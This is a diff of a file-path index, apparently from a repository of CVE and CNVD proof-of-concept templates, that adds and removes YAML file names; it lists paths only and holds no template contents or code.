./poc/cve/CVE-2024-3668-c8ffa38e284a09e692ef63a2e54e8547.yaml +./poc/cve/CVE-2024-3668.yaml ./poc/cve/CVE-2024-3670-fec3724139e128cadbd86aa3d4c79b55.yaml ./poc/cve/CVE-2024-3670.yaml ./poc/cve/CVE-2024-3671-ad0547b9184ff8fbd7390245f489244d.yaml @@ -36636,6 +36609,7 @@ ./poc/cve/CVE-2024-4463-464edc1eb3da2f9faf49c20859246d3c.yaml ./poc/cve/CVE-2024-4463.yaml ./poc/cve/CVE-2024-4468-e4718b86eead992f27bd617ba2db3191.yaml +./poc/cve/CVE-2024-4468.yaml ./poc/cve/CVE-2024-4469-da6061bf111a6e16e1ce2e21b77e6884.yaml ./poc/cve/CVE-2024-4469.yaml ./poc/cve/CVE-2024-4470-b43bea79e12b8b0c9f748d9c7ecf554d.yaml 
@@ -36741,6 +36715,7 @@ ./poc/cve/CVE-2024-4656-a5e8e9e2c51f12bcd24fc196b5414cb9.yaml ./poc/cve/CVE-2024-4656.yaml ./poc/cve/CVE-2024-4661-aa576507b767db894aef4c7b0b19b027.yaml +./poc/cve/CVE-2024-4661.yaml ./poc/cve/CVE-2024-4662-ab6e1b5977dc25cd02eb75a7c6103282.yaml ./poc/cve/CVE-2024-4662.yaml ./poc/cve/CVE-2024-4666-9132c7c1d96c4459b618f35c7b1deff4.yaml @@ -36892,9 +36867,11 @@ ./poc/cve/CVE-2024-5086-5878d22a233b8390d013118c3ec1a8f6.yaml ./poc/cve/CVE-2024-5086.yaml ./poc/cve/CVE-2024-5087-cdef2f6a63a1cc20224c34166a3e2dbe.yaml +./poc/cve/CVE-2024-5087.yaml ./poc/cve/CVE-2024-5088-16710672833e29d7b1683a03043820a1.yaml ./poc/cve/CVE-2024-5088.yaml ./poc/cve/CVE-2024-5091-50b2eecb2e1c04b3eff9ad58a7dd3c08.yaml +./poc/cve/CVE-2024-5091.yaml ./poc/cve/CVE-2024-5092-0f4aaeb58c0f91afc705b391dbdf7872.yaml ./poc/cve/CVE-2024-5092.yaml ./poc/cve/CVE-2024-5141-f003c81bdb67e0c478e1919516cc1594.yaml 
@@ -37012,22 +36989,28 @@ ./poc/cve/CVE-2024-5612-94c0f75b45145ba79530a3cebd812f91.yaml ./poc/cve/CVE-2024-5612.yaml ./poc/cve/CVE-2024-5613-9198b92debd41a94962756dcf76a3013.yaml +./poc/cve/CVE-2024-5613.yaml ./poc/cve/CVE-2024-5615-a77f3367ed2460f7ee46222aadc62216.yaml ./poc/cve/CVE-2024-5615.yaml ./poc/cve/CVE-2024-5637-52143d378292b1918b667c9107493dca.yaml ./poc/cve/CVE-2024-5637.yaml ./poc/cve/CVE-2024-5638-6b2bb507df8cc9b0ced9db594103e225.yaml +./poc/cve/CVE-2024-5638.yaml ./poc/cve/CVE-2024-5640-97926cf22b75d273b8be77e89027662a.yaml ./poc/cve/CVE-2024-5640.yaml ./poc/cve/CVE-2024-5645-1e0813366396dcffd446ea61fbcc4596.yaml ./poc/cve/CVE-2024-5645.yaml ./poc/cve/CVE-2024-5654-745e9ead8e1605f56e0df1bcb3525879.yaml +./poc/cve/CVE-2024-5654.yaml ./poc/cve/CVE-2024-5656-ed8938bd52fad7e4bf20c235a5cc7800.yaml ./poc/cve/CVE-2024-5656.yaml ./poc/cve/CVE-2024-5663-00dcb12873f526a638405780c6dcbe5f.yaml +./poc/cve/CVE-2024-5663.yaml ./poc/cve/CVE-2024-5665-fbf91f7b36454225b577032ff6b93e9b.yaml ./poc/cve/CVE-2024-5665.yaml ./poc/cve/CVE-2024-5758-637eadcd24b75860f6993f7f01fc3e2a.yaml +./poc/cve/CVE-2024-5758.yaml +./poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml ./poc/cve/CVE_RCE2-1.yaml ./poc/cve/CheckCVE_2021_21972.yaml ./poc/cve/Confluence_CVE-2022-26134.yaml 
@@ -37060,65 +37043,64 @@ ./poc/cve/cnvd-2018-13393-1038.yaml ./poc/cve/cnvd-2019-01348-1040.yaml ./poc/cve/cnvd-2019-01348-1041.yaml -./poc/cve/cnvd-2019-01348-1042.yaml ./poc/cve/cnvd-2019-01348-1043.yaml +./poc/cve/cnvd-2019-01348-1044.yaml ./poc/cve/cnvd-2019-01348-1045.yaml +./poc/cve/cnvd-2019-06255-1046.yaml ./poc/cve/cnvd-2019-06255-1047.yaml ./poc/cve/cnvd-2019-06255-1048.yaml ./poc/cve/cnvd-2019-06255-1049.yaml -./poc/cve/cnvd-2019-06255-1050.yaml ./poc/cve/cnvd-2019-19299-1052.yaml -./poc/cve/cnvd-2019-32204-1054.yaml +./poc/cve/cnvd-2019-32204-1053.yaml ./poc/cve/cnvd-2020-23735-1056.yaml ./poc/cve/cnvd-2020-23735-1057.yaml ./poc/cve/cnvd-2020-23735-1058.yaml ./poc/cve/cnvd-2020-23735-1059.yaml ./poc/cve/cnvd-2020-46552-1060.yaml ./poc/cve/cnvd-2020-46552.yaml +./poc/cve/cnvd-2020-56167-1061.yaml ./poc/cve/cnvd-2020-56167-1062.yaml ./poc/cve/cnvd-2020-56167-1063.yaml -./poc/cve/cnvd-2020-56167-1064.yaml ./poc/cve/cnvd-2020-62422-1065.yaml ./poc/cve/cnvd-2020-62422-1066.yaml ./poc/cve/cnvd-2020-62422-1067.yaml -./poc/cve/cnvd-2020-62422-1068.yaml +./poc/cve/cnvd-2020-62422-1069.yaml ./poc/cve/cnvd-2020-67113-1071.yaml ./poc/cve/cnvd-2020-67113-1072.yaml -./poc/cve/cnvd-2020-68596-1073.yaml +./poc/cve/cnvd-2020-68596-1074.yaml ./poc/cve/cnvd-2020-68596-1075.yaml ./poc/cve/cnvd-2020-68596-1076.yaml ./poc/cve/cnvd-2021-01931-1077.yaml +./poc/cve/cnvd-2021-01931-1078.yaml ./poc/cve/cnvd-2021-01931-1079.yaml ./poc/cve/cnvd-2021-09650-1080.yaml -./poc/cve/cnvd-2021-10543-1082.yaml ./poc/cve/cnvd-2021-10543-1083.yaml ./poc/cve/cnvd-2021-10543-1084.yaml ./poc/cve/cnvd-2021-10543-1085.yaml ./poc/cve/cnvd-2021-10543-1086.yaml -./poc/cve/cnvd-2021-14536-1088.yaml -./poc/cve/cnvd-2021-15822-1089.yaml +./poc/cve/cnvd-2021-14536-1087.yaml ./poc/cve/cnvd-2021-15822-1090.yaml ./poc/cve/cnvd-2021-15822-1091.yaml ./poc/cve/cnvd-2021-15822-1092.yaml +./poc/cve/cnvd-2021-15822-1093.yaml ./poc/cve/cnvd-2021-15822-1094.yaml ./poc/cve/cnvd-2021-15822-1095.yaml 
-./poc/cve/cnvd-2021-15824-1096.yaml +./poc/cve/cnvd-2021-15824-1097.yaml ./poc/cve/cnvd-2021-17369-1098.yaml ./poc/cve/cnvd-2021-17369-1099.yaml ./poc/cve/cnvd-2021-17369-1101.yaml ./poc/cve/cnvd-2021-17369-1102.yaml -./poc/cve/cnvd-2021-26422-1103.yaml ./poc/cve/cnvd-2021-26422-1104.yaml +./poc/cve/cnvd-2021-28277-1105.yaml ./poc/cve/cnvd-2021-28277-1106.yaml ./poc/cve/cnvd-2021-28277-1107.yaml -./poc/cve/cnvd-2021-30167-1108.yaml ./poc/cve/cnvd-2021-30167-1109.yaml ./poc/cve/cnvd-2021-30167-1110.yaml ./poc/cve/cnvd-2021-30167-1111.yaml ./poc/cve/cnvd-2021-30167-1112.yaml -./poc/cve/cnvd-2021-49104-1113.yaml +./poc/cve/cnvd-2021-49104-1114.yaml ./poc/cve/cnvd-2021-49104-1115.yaml -./poc/cve/cnvd-2022-03672-1117.yaml +./poc/cve/cnvd-2022-03672-1116.yaml ./poc/cve/coldfusion-cve-2010-2861-lfi.yml ./poc/cve/confluence-cve-2015-8399.yml ./poc/cve/confluence-cve-2019-3396-lfi.yaml @@ -37131,12 +37113,14 @@ ./poc/cve/craftcms-seomatic-cve-2020-9757-rce.yml ./poc/cve/cve-2000-0114-1295.yaml ./poc/cve/cve-2000-0114-1296.yaml +./poc/cve/cve-2000-0114-1297.yaml ./poc/cve/cve-2001-1473-1298.yaml ./poc/cve/cve-2001-1473-1299.yaml ./poc/cve/cve-2001-1473-1300.yaml ./poc/cve/cve-2002-1131-1301.yaml ./poc/cve/cve-2002-1131-1302.yaml ./poc/cve/cve-2002-1131-1303.yaml +./poc/cve/cve-2002-1131-1304.yaml ./poc/cve/cve-2004-0519-1305.yaml ./poc/cve/cve-2004-0519-1306.yaml ./poc/cve/cve-2004-0519-1307.yaml @@ -37173,7 +37157,6 @@ ./poc/cve/cve-2007-4504-1339.yaml ./poc/cve/cve-2007-4504-1340.yaml ./poc/cve/cve-2007-4504-1341.yaml -./poc/cve/cve-2007-4504-1342.yaml ./poc/cve/cve-2007-4556-1343.yaml ./poc/cve/cve-2007-4556-1344.yaml ./poc/cve/cve-2007-4556-1345.yaml 
@@ -37229,9 +37212,9 @@ ./poc/cve/cve-2008-6222-1395.yaml ./poc/cve/cve-2008-6222-1396.yaml ./poc/cve/cve-2008-6222-1397.yaml +./poc/cve/cve-2008-6222.yaml ./poc/cve/cve-2008-6668-1398.yaml ./poc/cve/cve-2008-6668-1399.yaml -./poc/cve/cve-2008-6668-1400.yaml ./poc/cve/cve-2008-6668-1401.yaml ./poc/cve/cve-2009-0545-1402.yaml ./poc/cve/cve-2009-0545-1403.yaml @@ -37239,6 +37222,7 @@ ./poc/cve/cve-2009-0545-1405.yaml ./poc/cve/cve-2009-0545-1406.yaml ./poc/cve/cve-2009-0545-1407.yaml +./poc/cve/cve-2009-0545.yaml ./poc/cve/cve-2009-0932-1408.yaml ./poc/cve/cve-2009-0932-1409.yaml ./poc/cve/cve-2009-0932-1410.yaml @@ -37256,7 +37240,6 @@ ./poc/cve/cve-2009-1496-1422.yaml ./poc/cve/cve-2009-1496-1423.yaml ./poc/cve/cve-2009-1496-1424.yaml -./poc/cve/cve-2009-1496.yaml ./poc/cve/cve-2009-1558-1425.yaml ./poc/cve/cve-2009-1558-1426.yaml ./poc/cve/cve-2009-1558-1427.yaml @@ -37273,12 +37256,10 @@ ./poc/cve/cve-2009-2015-1438.yaml ./poc/cve/cve-2009-2015-1439.yaml ./poc/cve/cve-2009-2015-1440.yaml -./poc/cve/cve-2009-2015-1441.yaml ./poc/cve/cve-2009-2100-1442.yaml ./poc/cve/cve-2009-2100-1443.yaml ./poc/cve/cve-2009-2100-1444.yaml ./poc/cve/cve-2009-2100-1445.yaml -./poc/cve/cve-2009-2100-1446.yaml ./poc/cve/cve-2009-2100-1447.yaml ./poc/cve/cve-2009-3053-1448.yaml ./poc/cve/cve-2009-3053-1449.yaml @@ -37286,7 +37267,6 @@ ./poc/cve/cve-2009-3053-1451.yaml ./poc/cve/cve-2009-3053-1452.yaml ./poc/cve/cve-2009-3053-1453.yaml -./poc/cve/cve-2009-3053.yaml ./poc/cve/cve-2009-3318-1454.yaml ./poc/cve/cve-2009-3318-1456.yaml ./poc/cve/cve-2009-3318-1457.yaml 
@@ -37347,11 +37327,11 @@ ./poc/cve/cve-2010-0943-1515.yaml ./poc/cve/cve-2010-0943-1516.yaml ./poc/cve/cve-2010-0943-1517.yaml +./poc/cve/cve-2010-0943.yaml ./poc/cve/cve-2010-0944-1518.yaml ./poc/cve/cve-2010-0944-1519.yaml ./poc/cve/cve-2010-0944-1520.yaml ./poc/cve/cve-2010-0944-1521.yaml -./poc/cve/cve-2010-0972-1522.yaml ./poc/cve/cve-2010-0972-1523.yaml ./poc/cve/cve-2010-0972-1524.yaml ./poc/cve/cve-2010-0972-1525.yaml @@ -37362,6 +37342,7 @@ ./poc/cve/cve-2010-0982-1530.yaml ./poc/cve/cve-2010-0982-1531.yaml ./poc/cve/cve-2010-0982-1532.yaml +./poc/cve/cve-2010-0982.yaml ./poc/cve/cve-2010-0985-1533.yaml ./poc/cve/cve-2010-0985-1534.yaml ./poc/cve/cve-2010-0985-1535.yaml @@ -37374,7 +37355,6 @@ ./poc/cve/cve-2010-1056-1542.yaml ./poc/cve/cve-2010-1056-1543.yaml ./poc/cve/cve-2010-1056-1544.yaml -./poc/cve/cve-2010-1056.yaml ./poc/cve/cve-2010-1081-1545.yaml ./poc/cve/cve-2010-1081-1546.yaml ./poc/cve/cve-2010-1081-1547.yaml @@ -37400,14 +37380,12 @@ ./poc/cve/cve-2010-1302-1564.yaml ./poc/cve/cve-2010-1302-1565.yaml ./poc/cve/cve-2010-1302-1566.yaml -./poc/cve/cve-2010-1302-1567.yaml ./poc/cve/cve-2010-1304-1568.yaml ./poc/cve/cve-2010-1304-1569.yaml ./poc/cve/cve-2010-1304-1570.yaml ./poc/cve/cve-2010-1304-1571.yaml ./poc/cve/cve-2010-1304-1572.yaml ./poc/cve/cve-2010-1304-1573.yaml -./poc/cve/cve-2010-1305-1574.yaml ./poc/cve/cve-2010-1305-1575.yaml ./poc/cve/cve-2010-1305-1576.yaml ./poc/cve/cve-2010-1305-1577.yaml @@ -37418,7 +37396,6 @@ ./poc/cve/cve-2010-1306-1582.yaml ./poc/cve/cve-2010-1306-1583.yaml ./poc/cve/cve-2010-1306-1584.yaml -./poc/cve/cve-2010-1307-1585.yaml ./poc/cve/cve-2010-1307-1586.yaml ./poc/cve/cve-2010-1307-1587.yaml ./poc/cve/cve-2010-1307-1588.yaml 
@@ -37427,43 +37404,45 @@ ./poc/cve/cve-2010-1308-1591.yaml ./poc/cve/cve-2010-1308-1592.yaml ./poc/cve/cve-2010-1308-1593.yaml -./poc/cve/cve-2010-1308.yaml ./poc/cve/cve-2010-1312-1594.yaml ./poc/cve/cve-2010-1312-1595.yaml ./poc/cve/cve-2010-1312-1596.yaml ./poc/cve/cve-2010-1312-1597.yaml +./poc/cve/cve-2010-1312-1598.yaml +./poc/cve/cve-2010-1312.yaml ./poc/cve/cve-2010-1313-1599.yaml ./poc/cve/cve-2010-1313-1600.yaml ./poc/cve/cve-2010-1313-1601.yaml ./poc/cve/cve-2010-1313-1602.yaml ./poc/cve/cve-2010-1313-1603.yaml +./poc/cve/cve-2010-1313-1604.yaml ./poc/cve/cve-2010-1314-1605.yaml ./poc/cve/cve-2010-1314-1606.yaml ./poc/cve/cve-2010-1314-1607.yaml ./poc/cve/cve-2010-1314-1608.yaml ./poc/cve/cve-2010-1314-1609.yaml -./poc/cve/cve-2010-1314.yaml ./poc/cve/cve-2010-1315-1610.yaml ./poc/cve/cve-2010-1315-1611.yaml ./poc/cve/cve-2010-1315-1612.yaml ./poc/cve/cve-2010-1315-1613.yaml ./poc/cve/cve-2010-1315-1614.yaml +./poc/cve/cve-2010-1315.yaml ./poc/cve/cve-2010-1340-1615.yaml ./poc/cve/cve-2010-1340-1616.yaml ./poc/cve/cve-2010-1340-1617.yaml ./poc/cve/cve-2010-1340-1618.yaml ./poc/cve/cve-2010-1340-1619.yaml ./poc/cve/cve-2010-1345-1620.yaml +./poc/cve/cve-2010-1345-1621.yaml ./poc/cve/cve-2010-1345-1622.yaml ./poc/cve/cve-2010-1345-1623.yaml ./poc/cve/cve-2010-1345-1624.yaml +./poc/cve/cve-2010-1345.yaml ./poc/cve/cve-2010-1352-1625.yaml ./poc/cve/cve-2010-1352-1626.yaml ./poc/cve/cve-2010-1352-1627.yaml ./poc/cve/cve-2010-1352-1628.yaml ./poc/cve/cve-2010-1352-1629.yaml -./poc/cve/cve-2010-1352.yaml -./poc/cve/cve-2010-1353-1630.yaml ./poc/cve/cve-2010-1353-1631.yaml ./poc/cve/cve-2010-1353-1632.yaml ./poc/cve/cve-2010-1353-1633.yaml 
@@ -37482,9 +37461,11 @@ ./poc/cve/cve-2010-1469-1647.yaml ./poc/cve/cve-2010-1469-1648.yaml ./poc/cve/cve-2010-1469-1649.yaml +./poc/cve/cve-2010-1469.yaml ./poc/cve/cve-2010-1470-1650.yaml ./poc/cve/cve-2010-1470-1651.yaml ./poc/cve/cve-2010-1470-1652.yaml +./poc/cve/cve-2010-1470-1653.yaml ./poc/cve/cve-2010-1470-1654.yaml ./poc/cve/cve-2010-1471-1655.yaml ./poc/cve/cve-2010-1471-1656.yaml @@ -37506,7 +37487,6 @@ ./poc/cve/cve-2010-1474-1671.yaml ./poc/cve/cve-2010-1474-1672.yaml ./poc/cve/cve-2010-1474-1673.yaml -./poc/cve/cve-2010-1474.yaml ./poc/cve/cve-2010-1475-1674.yaml ./poc/cve/cve-2010-1475-1675.yaml ./poc/cve/cve-2010-1475-1676.yaml @@ -37526,12 +37506,12 @@ ./poc/cve/cve-2010-1491-1691.yaml ./poc/cve/cve-2010-1491-1692.yaml ./poc/cve/cve-2010-1491-1693.yaml -./poc/cve/cve-2010-1491.yaml ./poc/cve/cve-2010-1494-1694.yaml ./poc/cve/cve-2010-1494-1695.yaml ./poc/cve/cve-2010-1494-1696.yaml ./poc/cve/cve-2010-1494-1697.yaml ./poc/cve/cve-2010-1494-1698.yaml +./poc/cve/cve-2010-1494.yaml ./poc/cve/cve-2010-1495-1699.yaml ./poc/cve/cve-2010-1495-1700.yaml ./poc/cve/cve-2010-1495-1701.yaml @@ -37546,7 +37526,6 @@ ./poc/cve/cve-2010-1532-1710.yaml ./poc/cve/cve-2010-1532-1711.yaml ./poc/cve/cve-2010-1532-1712.yaml -./poc/cve/cve-2010-1532.yaml ./poc/cve/cve-2010-1533-1713.yaml ./poc/cve/cve-2010-1533-1714.yaml ./poc/cve/cve-2010-1533-1715.yaml @@ -37563,7 +37542,6 @@ ./poc/cve/cve-2010-1535-1726.yaml ./poc/cve/cve-2010-1535-1727.yaml ./poc/cve/cve-2010-1535-1728.yaml -./poc/cve/cve-2010-1540-1729.yaml ./poc/cve/cve-2010-1540-1730.yaml ./poc/cve/cve-2010-1540-1731.yaml ./poc/cve/cve-2010-1540-1732.yaml 
@@ -37596,34 +37574,33 @@ ./poc/cve/cve-2010-1653-1757.yaml ./poc/cve/cve-2010-1653-1758.yaml ./poc/cve/cve-2010-1657-1760.yaml -./poc/cve/cve-2010-1657-1761.yaml ./poc/cve/cve-2010-1657-1762.yaml ./poc/cve/cve-2010-1657-1763.yaml ./poc/cve/cve-2010-1657-1764.yaml +./poc/cve/cve-2010-1658-1765.yaml ./poc/cve/cve-2010-1658-1766.yaml ./poc/cve/cve-2010-1658-1767.yaml ./poc/cve/cve-2010-1658-1768.yaml ./poc/cve/cve-2010-1658-1769.yaml +./poc/cve/cve-2010-1658.yaml ./poc/cve/cve-2010-1659-1770.yaml ./poc/cve/cve-2010-1659-1771.yaml ./poc/cve/cve-2010-1659-1772.yaml -./poc/cve/cve-2010-1659-1773.yaml ./poc/cve/cve-2010-1659-1774.yaml ./poc/cve/cve-2010-1714-1775.yaml ./poc/cve/cve-2010-1714-1776.yaml ./poc/cve/cve-2010-1714-1777.yaml ./poc/cve/cve-2010-1714-1778.yaml +./poc/cve/cve-2010-1714-1779.yaml ./poc/cve/cve-2010-1715-1780.yaml ./poc/cve/cve-2010-1715-1781.yaml ./poc/cve/cve-2010-1715-1782.yaml ./poc/cve/cve-2010-1715-1783.yaml ./poc/cve/cve-2010-1715-1784.yaml ./poc/cve/cve-2010-1715-1785.yaml -./poc/cve/cve-2010-1715.yaml ./poc/cve/cve-2010-1717-1786.yaml ./poc/cve/cve-2010-1717-1787.yaml ./poc/cve/cve-2010-1717-1788.yaml -./poc/cve/cve-2010-1717-1789.yaml ./poc/cve/cve-2010-1717-1790.yaml ./poc/cve/cve-2010-1718-1791.yaml ./poc/cve/cve-2010-1718-1792.yaml @@ -37631,7 +37608,6 @@ ./poc/cve/cve-2010-1718-1794.yaml ./poc/cve/cve-2010-1718-1795.yaml ./poc/cve/cve-2010-1718-1796.yaml -./poc/cve/cve-2010-1718.yaml ./poc/cve/cve-2010-1719-1797.yaml ./poc/cve/cve-2010-1719-1798.yaml ./poc/cve/cve-2010-1719-1799.yaml @@ -37652,7 +37628,6 @@ ./poc/cve/cve-2010-1858-1814.yaml ./poc/cve/cve-2010-1858-1815.yaml ./poc/cve/cve-2010-1858-1816.yaml -./poc/cve/cve-2010-1858.yaml ./poc/cve/cve-2010-1870-1817.yaml ./poc/cve/cve-2010-1870-1818.yaml ./poc/cve/cve-2010-1870-1819.yaml 
@@ -37676,6 +37651,7 @@ ./poc/cve/cve-2010-1952-1838.yaml ./poc/cve/cve-2010-1952-1839.yaml ./poc/cve/cve-2010-1953-1840.yaml +./poc/cve/cve-2010-1953-1841.yaml ./poc/cve/cve-2010-1953-1842.yaml ./poc/cve/cve-2010-1953-1843.yaml ./poc/cve/cve-2010-1954-1844.yaml @@ -37717,12 +37693,14 @@ ./poc/cve/cve-2010-1981-1880.yaml ./poc/cve/cve-2010-1981-1881.yaml ./poc/cve/cve-2010-1981-1882.yaml +./poc/cve/cve-2010-1981.yaml ./poc/cve/cve-2010-1982-1883.yaml ./poc/cve/cve-2010-1982-1884.yaml ./poc/cve/cve-2010-1982-1885.yaml ./poc/cve/cve-2010-1982-1886.yaml ./poc/cve/cve-2010-1982-1887.yaml ./poc/cve/cve-2010-1982-1888.yaml +./poc/cve/cve-2010-1982.yaml ./poc/cve/cve-2010-1983-1889.yaml ./poc/cve/cve-2010-1983-1890.yaml ./poc/cve/cve-2010-1983-1891.yaml @@ -37794,6 +37772,7 @@ ./poc/cve/cve-2010-2680-1958.yaml ./poc/cve/cve-2010-2680-1959.yaml ./poc/cve/cve-2010-2680.yaml +./poc/cve/cve-2010-2682-1960.yaml ./poc/cve/cve-2010-2682-1961.yaml ./poc/cve/cve-2010-2682-1962.yaml ./poc/cve/cve-2010-2682-1963.yaml @@ -37817,11 +37796,12 @@ ./poc/cve/cve-2010-2920-1981.yaml ./poc/cve/cve-2010-2920-1982.yaml ./poc/cve/cve-2010-2920-1983.yaml -./poc/cve/cve-2010-2920.yaml ./poc/cve/cve-2010-3203-1984.yaml ./poc/cve/cve-2010-3203-1985.yaml ./poc/cve/cve-2010-3203-1986.yaml +./poc/cve/cve-2010-3203-1987.yaml ./poc/cve/cve-2010-3203-1988.yaml +./poc/cve/cve-2010-3203.yaml ./poc/cve/cve-2010-3426-1989.yaml ./poc/cve/cve-2010-3426-1990.yaml ./poc/cve/cve-2010-3426-1991.yaml @@ -37830,7 +37810,6 @@ ./poc/cve/cve-2010-4231-1994.yaml ./poc/cve/cve-2010-4231-1995.yaml ./poc/cve/cve-2010-4231-1996.yaml -./poc/cve/cve-2010-4239-1997.yaml ./poc/cve/cve-2010-4239-1998.yaml ./poc/cve/cve-2010-4282-1999.yaml ./poc/cve/cve-2010-4282-2000.yaml @@ -37840,7 +37819,6 @@ ./poc/cve/cve-2010-4617-2004.yaml ./poc/cve/cve-2010-4617-2005.yaml ./poc/cve/cve-2010-4617-2006.yaml -./poc/cve/cve-2010-4617.yaml ./poc/cve/cve-2010-4719-2007.yaml ./poc/cve/cve-2010-4719-2008.yaml ./poc/cve/cve-2010-4719-2009.yaml 
@@ -37857,10 +37835,13 @@ ./poc/cve/cve-2010-5028-2022.yaml ./poc/cve/cve-2010-5028-2023.yaml ./poc/cve/cve-2010-5028-2024.yaml +./poc/cve/cve-2010-5028-2025.yaml ./poc/cve/cve-2010-5278-2026.yaml ./poc/cve/cve-2010-5278-2027.yaml ./poc/cve/cve-2010-5278-2028.yaml ./poc/cve/cve-2010-5278-2029.yaml +./poc/cve/cve-2010-5278-2030.yaml +./poc/cve/cve-2010-5278.yaml ./poc/cve/cve-2010-5286-2031.yaml ./poc/cve/cve-2010-5286-2032.yaml ./poc/cve/cve-2010-5286-2033.yaml @@ -37880,14 +37861,12 @@ ./poc/cve/cve-2011-2744-2049.yaml ./poc/cve/cve-2011-2744-2050.yaml ./poc/cve/cve-2011-2744-2051.yaml -./poc/cve/cve-2011-2744.yaml ./poc/cve/cve-2011-2780-2052.yaml ./poc/cve/cve-2011-2780-2053.yaml ./poc/cve/cve-2011-2780-2054.yaml ./poc/cve/cve-2011-2780-2055.yaml ./poc/cve/cve-2011-2780-2056.yaml ./poc/cve/cve-2011-3315-2058.yaml -./poc/cve/cve-2011-3315-2059.yaml ./poc/cve/cve-2011-3315-2060.yaml ./poc/cve/cve-2011-3315-2061.yaml ./poc/cve/cve-2011-4336-2062.yaml @@ -37922,6 +37901,7 @@ ./poc/cve/cve-2011-4926-2090.yaml ./poc/cve/cve-2011-4926-2091.yaml ./poc/cve/cve-2011-4926-2092.yaml +./poc/cve/cve-2011-4926.yaml ./poc/cve/cve-2011-4969.yaml ./poc/cve/cve-2011-5106-2093.yaml ./poc/cve/cve-2011-5106-2094.yaml @@ -37942,7 +37922,6 @@ ./poc/cve/cve-2011-5179-2109.yaml ./poc/cve/cve-2011-5179-2110.yaml ./poc/cve/cve-2011-5179-2111.yaml -./poc/cve/cve-2011-5179.yaml ./poc/cve/cve-2011-5181-2112.yaml ./poc/cve/cve-2011-5181-2113.yaml ./poc/cve/cve-2011-5181-2114.yaml @@ -37964,7 +37943,6 @@ ./poc/cve/cve-2012-0392-2129.yaml ./poc/cve/cve-2012-0392-2130.yaml ./poc/cve/cve-2012-0392-2131.yaml -./poc/cve/cve-2012-0896-2132.yaml ./poc/cve/cve-2012-0896-2133.yaml ./poc/cve/cve-2012-0896-2134.yaml ./poc/cve/cve-2012-0896-2135.yaml @@ -37980,6 +37958,7 @@ ./poc/cve/cve-2012-0981-2145.yaml ./poc/cve/cve-2012-0981-2146.yaml ./poc/cve/cve-2012-0981-2147.yaml +./poc/cve/cve-2012-0981.yaml ./poc/cve/cve-2012-0991-2148.yaml ./poc/cve/cve-2012-0991-2149.yaml ./poc/cve/cve-2012-0991-2150.yaml 
@@ -38010,6 +37989,7 @@ ./poc/cve/cve-2012-2371-2177.yaml ./poc/cve/cve-2012-2371-2178.yaml ./poc/cve/cve-2012-2371-2179.yaml +./poc/cve/cve-2012-2371.yaml ./poc/cve/cve-2012-3153-2180.yaml ./poc/cve/cve-2012-3153-2181.yaml ./poc/cve/cve-2012-3153-2182.yaml @@ -38030,6 +38010,7 @@ ./poc/cve/cve-2012-4273-2195.yaml ./poc/cve/cve-2012-4273-2196.yaml ./poc/cve/cve-2012-4273-2197.yaml +./poc/cve/cve-2012-4273-2198.yaml ./poc/cve/cve-2012-4547-2199.yaml ./poc/cve/cve-2012-4547-2200.yaml ./poc/cve/cve-2012-4547-2201.yaml @@ -38038,6 +38019,7 @@ ./poc/cve/cve-2012-4768-2204.yaml ./poc/cve/cve-2012-4768-2205.yaml ./poc/cve/cve-2012-4768-2206.yaml +./poc/cve/cve-2012-4768-2207.yaml ./poc/cve/cve-2012-4878-2208.yaml ./poc/cve/cve-2012-4878-2209.yaml ./poc/cve/cve-2012-4878-2210.yaml @@ -38109,11 +38091,9 @@ ./poc/cve/cve-2013-5528-2274.yaml ./poc/cve/cve-2013-5528-2275.yaml ./poc/cve/cve-2013-5528-2276.yaml -./poc/cve/cve-2013-5528.yaml ./poc/cve/cve-2013-5979-2277.yaml ./poc/cve/cve-2013-5979-2278.yaml ./poc/cve/cve-2013-5979-2279.yaml -./poc/cve/cve-2013-5979-2280.yaml ./poc/cve/cve-2013-6281-2281.yaml ./poc/cve/cve-2013-7091-2282.yaml ./poc/cve/cve-2013-7091-2283.yaml @@ -38123,6 +38103,7 @@ ./poc/cve/cve-2013-7240-2288.yaml ./poc/cve/cve-2013-7240-2289.yaml ./poc/cve/cve-2013-7240-2290.yaml +./poc/cve/cve-2013-7240.yaml ./poc/cve/cve-2014-10037-2291.yaml ./poc/cve/cve-2014-10037-2292.yaml ./poc/cve/cve-2014-10037-2293.yaml @@ -38145,6 +38126,7 @@ ./poc/cve/cve-2014-2908-2310.yaml ./poc/cve/cve-2014-2908-2311.yaml ./poc/cve/cve-2014-2962-2312.yaml +./poc/cve/cve-2014-2962-2313.yaml ./poc/cve/cve-2014-2962-2314.yaml ./poc/cve/cve-2014-2962-2315.yaml ./poc/cve/cve-2014-3120-2316.yaml @@ -38204,7 +38186,6 @@ ./poc/cve/cve-2014-4561-2372.yaml ./poc/cve/cve-2014-4561-2373.yaml ./poc/cve/cve-2014-4561-2374.yaml -./poc/cve/cve-2014-4561-2375.yaml ./poc/cve/cve-2014-4592-2376.yaml ./poc/cve/cve-2014-4592-2377.yaml ./poc/cve/cve-2014-4592-2378.yaml 
@@ -38215,7 +38196,6 @@ ./poc/cve/cve-2014-4940-2383.yaml ./poc/cve/cve-2014-4940-2384.yaml ./poc/cve/cve-2014-4940-2385.yaml -./poc/cve/cve-2014-4940.yaml ./poc/cve/cve-2014-5111-2386.yaml ./poc/cve/cve-2014-5111-2387.yaml ./poc/cve/cve-2014-5111-2388.yaml @@ -38254,6 +38234,7 @@ ./poc/cve/cve-2014-9094-2420.yaml ./poc/cve/cve-2014-9094-2421.yaml ./poc/cve/cve-2014-9094-2422.yaml +./poc/cve/cve-2014-9094.yaml ./poc/cve/cve-2014-9444-2423.yaml ./poc/cve/cve-2014-9444-2424.yaml ./poc/cve/cve-2014-9444-2425.yaml @@ -38261,12 +38242,14 @@ ./poc/cve/cve-2014-9444-2427.yaml ./poc/cve/cve-2014-9606-2428.yaml ./poc/cve/cve-2014-9606-2429.yaml +./poc/cve/cve-2014-9606-2430.yaml ./poc/cve/cve-2014-9607-2431.yaml ./poc/cve/cve-2014-9607-2432.yaml ./poc/cve/cve-2014-9607-2433.yaml ./poc/cve/cve-2014-9608-2434.yaml ./poc/cve/cve-2014-9608-2435.yaml ./poc/cve/cve-2014-9608-2436.yaml +./poc/cve/cve-2014-9609-2437.yaml ./poc/cve/cve-2014-9609-2438.yaml ./poc/cve/cve-2014-9609-2439.yaml ./poc/cve/cve-2014-9614-2440.yaml @@ -38284,7 +38267,6 @@ ./poc/cve/cve-2015-0554-2453.yaml ./poc/cve/cve-2015-0554-2454.yaml ./poc/cve/cve-2015-0554-2455.yaml 